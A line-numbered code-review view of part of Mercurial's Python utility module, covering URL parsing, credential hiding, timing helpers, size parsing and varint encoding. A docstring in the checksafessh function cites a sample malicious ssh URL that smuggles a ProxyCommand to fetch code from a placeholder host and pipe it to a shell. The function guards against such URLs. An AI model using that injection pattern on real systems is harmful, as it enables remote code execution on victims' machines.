2949 2951
2950 2952 If port is an integer, it's returned as is. If it's a string, it's
2951 2953 looked up using socket.getservbyname(). If there's no matching
2952 2954 service, error.Abort is raised.
2953 2955 """
2954 2956 try:
2955 2957 return int(port)
2956 2958 except ValueError:
2957 2959 pass
2958 2960
2959 2961 try:
2960 2962 return socket.getservbyname(pycompat.sysstr(port))
2961 2963 except socket.error:
2962 2964 raise error.Abort(
2963 2965 _(b"no port number associated with service '%s'") % port
2964 2966 )
2965 2967
2966 2968
2967 2969 class url(object):
2968 2970 r"""Reliable URL parser.
2969 2971
2970 2972 This parses URLs and provides attributes for the following
2971 2973 components:
2972 2974
2973 2975 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974 2976
2975 2977 Missing components are set to None. The only exception is
2976 2978 fragment, which is set to '' if present but empty.
2977 2979
2978 2980 If parsefragment is False, fragment is included in query. If
2979 2981 parsequery is False, query is included in path. If both are
2980 2982 False, both fragment and query are included in path.
2981 2983
2982 2984 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983 2985
2984 2986 Note that for backward compatibility reasons, bundle URLs do not
2985 2987 take host names. That means 'bundle://../' has a path of '../'.
2986 2988
2987 2989 Examples:
2988 2990
2989 2991 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 2992 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 2993 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 2994 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 2995 >>> url(b'file:///home/joe/repo')
2994 2996 <url scheme: 'file', path: '/home/joe/repo'>
2995 2997 >>> url(b'file:///c:/temp/foo/')
2996 2998 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 2999 >>> url(b'bundle:foo')
2998 3000 <url scheme: 'bundle', path: 'foo'>
2999 3001 >>> url(b'bundle://../foo')
3000 3002 <url scheme: 'bundle', path: '../foo'>
3001 3003 >>> url(br'c:\foo\bar')
3002 3004 <url path: 'c:\\foo\\bar'>
3003 3005 >>> url(br'\\blah\blah\blah')
3004 3006 <url path: '\\\\blah\\blah\\blah'>
3005 3007 >>> url(br'\\blah\blah\blah#baz')
3006 3008 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 3009 >>> url(br'file:///C:\users\me')
3008 3010 <url scheme: 'file', path: 'C:\\users\\me'>
3009 3011
3010 3012 Authentication credentials:
3011 3013
3012 3014 >>> url(b'ssh://joe:xyz@x/repo')
3013 3015 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 3016 >>> url(b'ssh://joe@x/repo')
3015 3017 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016 3018
3017 3019 Query strings and fragments:
3018 3020
3019 3021 >>> url(b'http://host/a?b#c')
3020 3022 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 3023 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 3024 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023 3025
3024 3026 Empty path:
3025 3027
3026 3028 >>> url(b'')
3027 3029 <url path: ''>
3028 3030 >>> url(b'#a')
3029 3031 <url path: '', fragment: 'a'>
3030 3032 >>> url(b'http://host/')
3031 3033 <url scheme: 'http', host: 'host', path: ''>
3032 3034 >>> url(b'http://host/#a')
3033 3035 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034 3036
3035 3037 Only scheme:
3036 3038
3037 3039 >>> url(b'http:')
3038 3040 <url scheme: 'http'>
3039 3041 """
3040 3042
3041 3043 _safechars = b"!~*'()+"
3042 3044 _safepchars = b"/!~*'()+:\\"
3043 3045 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044 3046
3045 3047 def __init__(self, path, parsequery=True, parsefragment=True):
3046 3048 # type: (bytes, bool, bool) -> None
3047 3049 # We slowly chomp away at path until we have only the path left
3048 3050 self.scheme = self.user = self.passwd = self.host = None
3049 3051 self.port = self.path = self.query = self.fragment = None
3050 3052 self._localpath = True
3051 3053 self._hostport = b''
3052 3054 self._origpath = path
3053 3055
3054 3056 if parsefragment and b'#' in path:
3055 3057 path, self.fragment = path.split(b'#', 1)
3056 3058
3057 3059 # special case for Windows drive letters and UNC paths
3058 3060 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 3061 self.path = path
3060 3062 return
3061 3063
3062 3064 # For compatibility reasons, we can't handle bundle paths as
3063 3065 # normal URLS
3064 3066 if path.startswith(b'bundle:'):
3065 3067 self.scheme = b'bundle'
3066 3068 path = path[7:]
3067 3069 if path.startswith(b'//'):
3068 3070 path = path[2:]
3069 3071 self.path = path
3070 3072 return
3071 3073
3072 3074 if self._matchscheme(path):
3073 3075 parts = path.split(b':', 1)
3074 3076 if parts[0]:
3075 3077 self.scheme, path = parts
3076 3078 self._localpath = False
3077 3079
3078 3080 if not path:
3079 3081 path = None
3080 3082 if self._localpath:
3081 3083 self.path = b''
3082 3084 return
3083 3085 else:
3084 3086 if self._localpath:
3085 3087 self.path = path
3086 3088 return
3087 3089
3088 3090 if parsequery and b'?' in path:
3089 3091 path, self.query = path.split(b'?', 1)
3090 3092 if not path:
3091 3093 path = None
3092 3094 if not self.query:
3093 3095 self.query = None
3094 3096
3095 3097 # // is required to specify a host/authority
3096 3098 if path and path.startswith(b'//'):
3097 3099 parts = path[2:].split(b'/', 1)
3098 3100 if len(parts) > 1:
3099 3101 self.host, path = parts
3100 3102 else:
3101 3103 self.host = parts[0]
3102 3104 path = None
3103 3105 if not self.host:
3104 3106 self.host = None
3105 3107 # path of file:///d is /d
3106 3108 # path of file:///d:/ is d:/, not /d:/
3107 3109 if path and not hasdriveletter(path):
3108 3110 path = b'/' + path
3109 3111
3110 3112 if self.host and b'@' in self.host:
3111 3113 self.user, self.host = self.host.rsplit(b'@', 1)
3112 3114 if b':' in self.user:
3113 3115 self.user, self.passwd = self.user.split(b':', 1)
3114 3116 if not self.host:
3115 3117 self.host = None
3116 3118
3117 3119 # Don't split on colons in IPv6 addresses without ports
3118 3120 if (
3119 3121 self.host
3120 3122 and b':' in self.host
3121 3123 and not (
3122 3124 self.host.startswith(b'[') and self.host.endswith(b']')
3123 3125 )
3124 3126 ):
3125 3127 self._hostport = self.host
3126 3128 self.host, self.port = self.host.rsplit(b':', 1)
3127 3129 if not self.host:
3128 3130 self.host = None
3129 3131
3130 3132 if (
3131 3133 self.host
3132 3134 and self.scheme == b'file'
3133 3135 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 3136 ):
3135 3137 raise error.Abort(
3136 3138 _(b'file:// URLs can only refer to localhost')
3137 3139 )
3138 3140
3139 3141 self.path = path
3140 3142
3141 3143 # leave the query string escaped
3142 3144 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 3145 v = getattr(self, a)
3144 3146 if v is not None:
3145 3147 setattr(self, a, urlreq.unquote(v))
3146 3148
3147 3149 def copy(self):
3148 3150 u = url(b'temporary useless value')
3149 3151 u.path = self.path
3150 3152 u.scheme = self.scheme
3151 3153 u.user = self.user
3152 3154 u.passwd = self.passwd
3153 3155 u.host = self.host
3154 3156 u.path = self.path
3155 3157 u.query = self.query
3156 3158 u.fragment = self.fragment
3157 3159 u._localpath = self._localpath
3158 3160 u._hostport = self._hostport
3159 3161 u._origpath = self._origpath
3160 3162 return u
3161 3163
3162 3164 @encoding.strmethod
3163 3165 def __repr__(self):
3164 3166 attrs = []
3165 3167 for a in (
3166 3168 b'scheme',
3167 3169 b'user',
3168 3170 b'passwd',
3169 3171 b'host',
3170 3172 b'port',
3171 3173 b'path',
3172 3174 b'query',
3173 3175 b'fragment',
3174 3176 ):
3175 3177 v = getattr(self, a)
3176 3178 if v is not None:
3177 3179 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3178 3180 return b'<url %s>' % b', '.join(attrs)
3179 3181
3180 3182 def __bytes__(self):
3181 3183 r"""Join the URL's components back into a URL string.
3182 3184
3183 3185 Examples:
3184 3186
3185 3187 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3186 3188 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3187 3189 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3188 3190 'http://user:pw@host:80/?foo=bar&baz=42'
3189 3191 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3190 3192 'http://user:pw@host:80/?foo=bar%3dbaz'
3191 3193 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3192 3194 'ssh://user:pw@[::1]:2200//home/joe#'
3193 3195 >>> bytes(url(b'http://localhost:80//'))
3194 3196 'http://localhost:80//'
3195 3197 >>> bytes(url(b'http://localhost:80/'))
3196 3198 'http://localhost:80/'
3197 3199 >>> bytes(url(b'http://localhost:80'))
3198 3200 'http://localhost:80/'
3199 3201 >>> bytes(url(b'bundle:foo'))
3200 3202 'bundle:foo'
3201 3203 >>> bytes(url(b'bundle://../foo'))
3202 3204 'bundle:../foo'
3203 3205 >>> bytes(url(b'path'))
3204 3206 'path'
3205 3207 >>> bytes(url(b'file:///tmp/foo/bar'))
3206 3208 'file:///tmp/foo/bar'
3207 3209 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3208 3210 'file:///c:/tmp/foo/bar'
3209 3211 >>> print(url(br'bundle:foo\bar'))
3210 3212 bundle:foo\bar
3211 3213 >>> print(url(br'file:///D:\data\hg'))
3212 3214 file:///D:\data\hg
3213 3215 """
3214 3216 if self._localpath:
3215 3217 s = self.path
3216 3218 if self.scheme == b'bundle':
3217 3219 s = b'bundle:' + s
3218 3220 if self.fragment:
3219 3221 s += b'#' + self.fragment
3220 3222 return s
3221 3223
3222 3224 s = self.scheme + b':'
3223 3225 if self.user or self.passwd or self.host:
3224 3226 s += b'//'
3225 3227 elif self.scheme and (
3226 3228 not self.path
3227 3229 or self.path.startswith(b'/')
3228 3230 or hasdriveletter(self.path)
3229 3231 ):
3230 3232 s += b'//'
3231 3233 if hasdriveletter(self.path):
3232 3234 s += b'/'
3233 3235 if self.user:
3234 3236 s += urlreq.quote(self.user, safe=self._safechars)
3235 3237 if self.passwd:
3236 3238 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3237 3239 if self.user or self.passwd:
3238 3240 s += b'@'
3239 3241 if self.host:
3240 3242 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3241 3243 s += urlreq.quote(self.host)
3242 3244 else:
3243 3245 s += self.host
3244 3246 if self.port:
3245 3247 s += b':' + urlreq.quote(self.port)
3246 3248 if self.host:
3247 3249 s += b'/'
3248 3250 if self.path:
3249 3251 # TODO: similar to the query string, we should not unescape the
3250 3252 # path when we store it, the path might contain '%2f' = '/',
3251 3253 # which we should *not* escape.
3252 3254 s += urlreq.quote(self.path, safe=self._safepchars)
3253 3255 if self.query:
3254 3256 # we store the query in escaped form.
3255 3257 s += b'?' + self.query
3256 3258 if self.fragment is not None:
3257 3259 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3258 3260 return s
3259 3261
3260 3262 __str__ = encoding.strmethod(__bytes__)
3261 3263
3262 3264 def authinfo(self):
3263 3265 user, passwd = self.user, self.passwd
3264 3266 try:
3265 3267 self.user, self.passwd = None, None
3266 3268 s = bytes(self)
3267 3269 finally:
3268 3270 self.user, self.passwd = user, passwd
3269 3271 if not self.user:
3270 3272 return (s, None)
3271 3273 # authinfo[1] is passed to urllib2 password manager, and its
3272 3274 # URIs must not contain credentials. The host is passed in the
3273 3275 # URIs list because Python < 2.4.3 uses only that to search for
3274 3276 # a password.
3275 3277 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3276 3278
3277 3279 def isabs(self):
3278 3280 if self.scheme and self.scheme != b'file':
3279 3281 return True # remote URL
3280 3282 if hasdriveletter(self.path):
3281 3283 return True # absolute for our purposes - can't be joined()
3282 3284 if self.path.startswith(br'\\'):
3283 3285 return True # Windows UNC path
3284 3286 if self.path.startswith(b'/'):
3285 3287 return True # POSIX-style
3286 3288 return False
3287 3289
3288 3290 def localpath(self):
3289 3291 # type: () -> bytes
3290 3292 if self.scheme == b'file' or self.scheme == b'bundle':
3291 3293 path = self.path or b'/'
3292 3294 # For Windows, we need to promote hosts containing drive
3293 3295 # letters to paths with drive letters.
3294 3296 if hasdriveletter(self._hostport):
3295 3297 path = self._hostport + b'/' + self.path
3296 3298 elif (
3297 3299 self.host is not None and self.path and not hasdriveletter(path)
3298 3300 ):
3299 3301 path = b'/' + path
3300 3302 return path
3301 3303 return self._origpath
3302 3304
3303 3305 def islocal(self):
3304 3306 '''whether localpath will return something that posixfile can open'''
3305 3307 return (
3306 3308 not self.scheme
3307 3309 or self.scheme == b'file'
3308 3310 or self.scheme == b'bundle'
3309 3311 )
3310 3312
3311 3313
3312 3314 def hasscheme(path):
3313 3315 # type: (bytes) -> bool
3314 3316 return bool(url(path).scheme) # cast to help pytype
3315 3317
3316 3318
3317 3319 def hasdriveletter(path):
3318 3320 # type: (bytes) -> bool
3319 3321 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3320 3322
3321 3323
3322 3324 def urllocalpath(path):
3323 3325 # type: (bytes) -> bytes
3324 3326 return url(path, parsequery=False, parsefragment=False).localpath()
3325 3327
3326 3328
3327 3329 def checksafessh(path):
3328 3330 # type: (bytes) -> None
3329 3331 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3330 3332
3331 3333 This is a sanity check for ssh urls. ssh will parse the first item as
3332 3334 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3333 3335 Let's prevent these potentially exploited urls entirely and warn the
3334 3336 user.
3335 3337
3336 3338 Raises an error.Abort when the url is unsafe.
3337 3339 """
3338 3340 path = urlreq.unquote(path)
3339 3341 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3340 3342 raise error.Abort(
3341 3343 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3342 3344 )
3343 3345
3344 3346
3345 3347 def hidepassword(u):
3346 3348 # type: (bytes) -> bytes
3347 3349 '''hide user credential in a url string'''
3348 3350 u = url(u)
3349 3351 if u.passwd:
3350 3352 u.passwd = b'***'
3351 3353 return bytes(u)
3352 3354
3353 3355
3354 3356 def removeauth(u):
3355 3357 # type: (bytes) -> bytes
3356 3358 '''remove all authentication information from a url string'''
3357 3359 u = url(u)
3358 3360 u.user = u.passwd = None
3359 3361 return bytes(u)
3360 3362
3361 3363
3362 3364 timecount = unitcountfn(
3363 3365 (1, 1e3, _(b'%.0f s')),
3364 3366 (100, 1, _(b'%.1f s')),
3365 3367 (10, 1, _(b'%.2f s')),
3366 3368 (1, 1, _(b'%.3f s')),
3367 3369 (100, 0.001, _(b'%.1f ms')),
3368 3370 (10, 0.001, _(b'%.2f ms')),
3369 3371 (1, 0.001, _(b'%.3f ms')),
3370 3372 (100, 0.000001, _(b'%.1f us')),
3371 3373 (10, 0.000001, _(b'%.2f us')),
3372 3374 (1, 0.000001, _(b'%.3f us')),
3373 3375 (100, 0.000000001, _(b'%.1f ns')),
3374 3376 (10, 0.000000001, _(b'%.2f ns')),
3375 3377 (1, 0.000000001, _(b'%.3f ns')),
3376 3378 )
3377 3379
3378 3380
3379 3381 @attr.s
3380 3382 class timedcmstats(object):
3381 3383 """Stats information produced by the timedcm context manager on entering."""
3382 3384
3383 3385 # the starting value of the timer as a float (meaning and resulution is
3384 3386 # platform dependent, see util.timer)
3385 3387 start = attr.ib(default=attr.Factory(lambda: timer()))
3386 3388 # the number of seconds as a floating point value; starts at 0, updated when
3387 3389 # the context is exited.
3388 3390 elapsed = attr.ib(default=0)
3389 3391 # the number of nested timedcm context managers.
3390 3392 level = attr.ib(default=1)
3391 3393
3392 3394 def __bytes__(self):
3393 3395 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3394 3396
3395 3397 __str__ = encoding.strmethod(__bytes__)
3396 3398
3397 3399
3398 3400 @contextlib.contextmanager
3399 3401 def timedcm(whencefmt, *whenceargs):
3400 3402 """A context manager that produces timing information for a given context.
3401 3403
3402 3404 On entering a timedcmstats instance is produced.
3403 3405
3404 3406 This context manager is reentrant.
3405 3407
3406 3408 """
3407 3409 # track nested context managers
3408 3410 timedcm._nested += 1
3409 3411 timing_stats = timedcmstats(level=timedcm._nested)
3410 3412 try:
3411 3413 with tracing.log(whencefmt, *whenceargs):
3412 3414 yield timing_stats
3413 3415 finally:
3414 3416 timing_stats.elapsed = timer() - timing_stats.start
3415 3417 timedcm._nested -= 1
3416 3418
3417 3419
3418 3420 timedcm._nested = 0
3419 3421
3420 3422
3421 3423 def timed(func):
3422 3424 """Report the execution time of a function call to stderr.
3423 3425
3424 3426 During development, use as a decorator when you need to measure
3425 3427 the cost of a function, e.g. as follows:
3426 3428
3427 3429 @util.timed
3428 3430 def foo(a, b, c):
3429 3431 pass
3430 3432 """
3431 3433
3432 3434 def wrapper(*args, **kwargs):
3433 3435 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3434 3436 result = func(*args, **kwargs)
3435 3437 stderr = procutil.stderr
3436 3438 stderr.write(
3437 3439 b'%s%s: %s\n'
3438 3440 % (
3439 3441 b' ' * time_stats.level * 2,
3440 3442 pycompat.bytestr(func.__name__),
3441 3443 time_stats,
3442 3444 )
3443 3445 )
3444 3446 return result
3445 3447
3446 3448 return wrapper
3447 3449
3448 3450
3449 3451 _sizeunits = (
3450 3452 (b'm', 2 ** 20),
3451 3453 (b'k', 2 ** 10),
3452 3454 (b'g', 2 ** 30),
3453 3455 (b'kb', 2 ** 10),
3454 3456 (b'mb', 2 ** 20),
3455 3457 (b'gb', 2 ** 30),
3456 3458 (b'b', 1),
3457 3459 )
3458 3460
3459 3461
3460 3462 def sizetoint(s):
3461 3463 # type: (bytes) -> int
3462 3464 """Convert a space specifier to a byte count.
3463 3465
3464 3466 >>> sizetoint(b'30')
3465 3467 30
3466 3468 >>> sizetoint(b'2.2kb')
3467 3469 2252
3468 3470 >>> sizetoint(b'6M')
3469 3471 6291456
3470 3472 """
3471 3473 t = s.strip().lower()
3472 3474 try:
3473 3475 for k, u in _sizeunits:
3474 3476 if t.endswith(k):
3475 3477 return int(float(t[: -len(k)]) * u)
3476 3478 return int(t)
3477 3479 except ValueError:
3478 3480 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479 3481
3480 3482
3481 3483 class hooks(object):
3482 3484 """A collection of hook functions that can be used to extend a
3483 3485 function's behavior. Hooks are called in lexicographic order,
3484 3486 based on the names of their sources."""
3485 3487
3486 3488 def __init__(self):
3487 3489 self._hooks = []
3488 3490
3489 3491 def add(self, source, hook):
3490 3492 self._hooks.append((source, hook))
3491 3493
3492 3494 def __call__(self, *args):
3493 3495 self._hooks.sort(key=lambda x: x[0])
3494 3496 results = []
3495 3497 for source, hook in self._hooks:
3496 3498 results.append(hook(*args))
3497 3499 return results
3498 3500
3499 3501
3500 3502 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3501 3503 """Yields lines for a nicely formatted stacktrace.
3502 3504 Skips the 'skip' last entries, then return the last 'depth' entries.
3503 3505 Each file+linenumber is formatted according to fileline.
3504 3506 Each line is formatted according to line.
3505 3507 If line is None, it yields:
3506 3508 length of longest filepath+line number,
3507 3509 filepath+linenumber,
3508 3510 function
3509 3511
3510 3512 Not be used in production code but very convenient while developing.
3511 3513 """
3512 3514 entries = [
3513 3515 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3514 3516 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3515 3517 ][-depth:]
3516 3518 if entries:
3517 3519 fnmax = max(len(entry[0]) for entry in entries)
3518 3520 for fnln, func in entries:
3519 3521 if line is None:
3520 3522 yield (fnmax, fnln, func)
3521 3523 else:
3522 3524 yield line % (fnmax, fnln, func)
3523 3525
3524 3526
3525 3527 def debugstacktrace(
3526 3528 msg=b'stacktrace',
3527 3529 skip=0,
3528 3530 f=procutil.stderr,
3529 3531 otherf=procutil.stdout,
3530 3532 depth=0,
3531 3533 prefix=b'',
3532 3534 ):
3533 3535 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3534 3536 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3535 3537 By default it will flush stdout first.
3536 3538 It can be used everywhere and intentionally does not require an ui object.
3537 3539 Not be used in production code but very convenient while developing.
3538 3540 """
3539 3541 if otherf:
3540 3542 otherf.flush()
3541 3543 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3542 3544 for line in getstackframes(skip + 1, depth=depth):
3543 3545 f.write(prefix + line)
3544 3546 f.flush()
3545 3547
3546 3548
3547 3549 # convenient shortcut
3548 3550 dst = debugstacktrace
3549 3551
3550 3552
3551 3553 def safename(f, tag, ctx, others=None):
3552 3554 """
3553 3555 Generate a name that it is safe to rename f to in the given context.
3554 3556
3555 3557 f: filename to rename
3556 3558 tag: a string tag that will be included in the new name
3557 3559 ctx: a context, in which the new name must not exist
3558 3560 others: a set of other filenames that the new name must not be in
3559 3561
3560 3562 Returns a file name of the form oldname~tag[~number] which does not exist
3561 3563 in the provided context and is not in the set of other names.
3562 3564 """
3563 3565 if others is None:
3564 3566 others = set()
3565 3567
3566 3568 fn = b'%s~%s' % (f, tag)
3567 3569 if fn not in ctx and fn not in others:
3568 3570 return fn
3569 3571 for n in itertools.count(1):
3570 3572 fn = b'%s~%s~%s' % (f, tag, n)
3571 3573 if fn not in ctx and fn not in others:
3572 3574 return fn
3573 3575
3574 3576
3575 3577 def readexactly(stream, n):
3576 3578 '''read n bytes from stream.read and abort if less was available'''
3577 3579 s = stream.read(n)
3578 3580 if len(s) < n:
3579 3581 raise error.Abort(
3580 3582 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3581 3583 % (len(s), n)
3582 3584 )
3583 3585 return s
3584 3586
3585 3587
3586 3588 def uvarintencode(value):
3587 3589 """Encode an unsigned integer value to a varint.
3588 3590
3589 3591 A varint is a variable length integer of 1 or more bytes. Each byte
3590 3592 except the last has the most significant bit set. The lower 7 bits of
3591 3593 each byte store the 2's complement representation, least significant group
3592 3594 first.
3593 3595
3594 3596 >>> uvarintencode(0)
3595 3597 '\\x00'
3596 3598 >>> uvarintencode(1)
3597 3599 '\\x01'
3598 3600 >>> uvarintencode(127)
3599 3601 '\\x7f'
3600 3602 >>> uvarintencode(1337)
3601 3603 '\\xb9\\n'
3602 3604 >>> uvarintencode(65536)
3603 3605 '\\x80\\x80\\x04'
3604 3606 >>> uvarintencode(-1)
3605 3607 Traceback (most recent call last):
3606 3608 ...
3607 3609 ProgrammingError: negative value for uvarint: -1
3608 3610 """
3609 3611 if value < 0:
3610 3612 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3611 3613 bits = value & 0x7F
3612 3614 value >>= 7
3613 3615 bytes = []
3614 3616 while value:
3615 3617 bytes.append(pycompat.bytechr(0x80 | bits))
3616 3618 bits = value & 0x7F
3617 3619 value >>= 7
3618 3620 bytes.append(pycompat.bytechr(bits))
3619 3621
3620 3622 return b''.join(bytes)
3621 3623
3622 3624
3623 3625 def uvarintdecodestream(fh):
3624 3626 """Decode an unsigned variable length integer from a stream.
3625 3627
3626 3628 The passed argument is anything that has a ``.read(N)`` method.
3627 3629
3628 3630 >>> try:
3629 3631 ... from StringIO import StringIO as BytesIO
3630 3632 ... except ImportError:
3631 3633 ... from io import BytesIO
3632 3634 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3633 3635 0
3634 3636 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3635 3637 1
3636 3638 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3637 3639 127
3638 3640 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3639 3641 1337
3640 3642 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3641 3643 65536
3642 3644 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3643 3645 Traceback (most recent call last):
3644 3646 ...
3645 3647 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3646 3648 """
3647 3649 result = 0
3648 3650 shift = 0
3649 3651 while True:
3650 3652 byte = ord(readexactly(fh, 1))
3651 3653 result |= (byte & 0x7F) << shift
3652 3654 if not (byte & 0x80):
3653 3655 return result
3654 3656 shift += 7
3655 3657
3656 3658
3657 3659 # Passing the '' locale means that the locale should be set according to the
3658 3660 # user settings (environment variables).
3659 3661 # Python sometimes avoids setting the global locale settings. When interfacing
3660 3662 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 3663 # locale settings must be initialized correctly. Python 2 does not initialize
3662 3664 # the global locale settings on interpreter startup. Python 3 sometimes
3663 3665 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 3666 # explicitly initialize it to get consistent behavior if it's not already
3665 3667 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 3668 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 3669 # if we can remove this code.
3668 3670 @contextlib.contextmanager
3669 3671 def with_lc_ctype():
3670 3672 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3671 3673 if oldloc == 'C':
3672 3674 try:
3673 3675 try:
3674 3676 locale.setlocale(locale.LC_CTYPE, '')
3675 3677 except locale.Error:
3676 3678 # The likely case is that the locale from the environment
3677 3679 # variables is unknown.
3678 3680 pass
3679 3681 yield
3680 3682 finally:
3681 3683 locale.setlocale(locale.LC_CTYPE, oldloc)
3682 3684 else:
3683 3685 yield
3684 3686
3685 3687
3686 3688 def _estimatememory():
3687 3689 # type: () -> Optional[int]
3688 3690 """Provide an estimate for the available system memory in Bytes.
3689 3691
3690 3692 If no estimate can be provided on the platform, returns None.
3691 3693 """
3692 3694 if pycompat.sysplatform.startswith(b'win'):
3693 3695 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3694 3696 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3695 3697 from ctypes.wintypes import ( # pytype: disable=import-error
3696 3698 Structure,
3697 3699 byref,
3698 3700 sizeof,
3699 3701 windll,
3700 3702 )
3701 3703
3702 3704 class MEMORYSTATUSEX(Structure):
3703 3705 _fields_ = [
3704 3706 ('dwLength', DWORD),
3705 3707 ('dwMemoryLoad', DWORD),
3706 3708 ('ullTotalPhys', DWORDLONG),
3707 3709 ('ullAvailPhys', DWORDLONG),
3708 3710 ('ullTotalPageFile', DWORDLONG),
3709 3711 ('ullAvailPageFile', DWORDLONG),
3710 3712 ('ullTotalVirtual', DWORDLONG),
3711 3713 ('ullAvailVirtual', DWORDLONG),
3712 3714 ('ullExtendedVirtual', DWORDLONG),
3713 3715 ]
3714 3716
3715 3717 x = MEMORYSTATUSEX()
3716 3718 x.dwLength = sizeof(x)
3717 3719 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3718 3720 return x.ullAvailPhys
3719 3721
3720 3722 # On newer Unix-like systems and Mac OSX, the sysconf interface
3721 3723 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3722 3724 # seems to be implemented on most systems.
3723 3725 try:
3724 3726 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3725 3727 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3726 3728 return pagesize * pages
3727 3729 except OSError: # sysconf can fail
3728 3730 pass
3729 3731 except KeyError: # unknown parameter
3730 3732 pass
General Comments 0
You need to be logged in to leave comments. Login now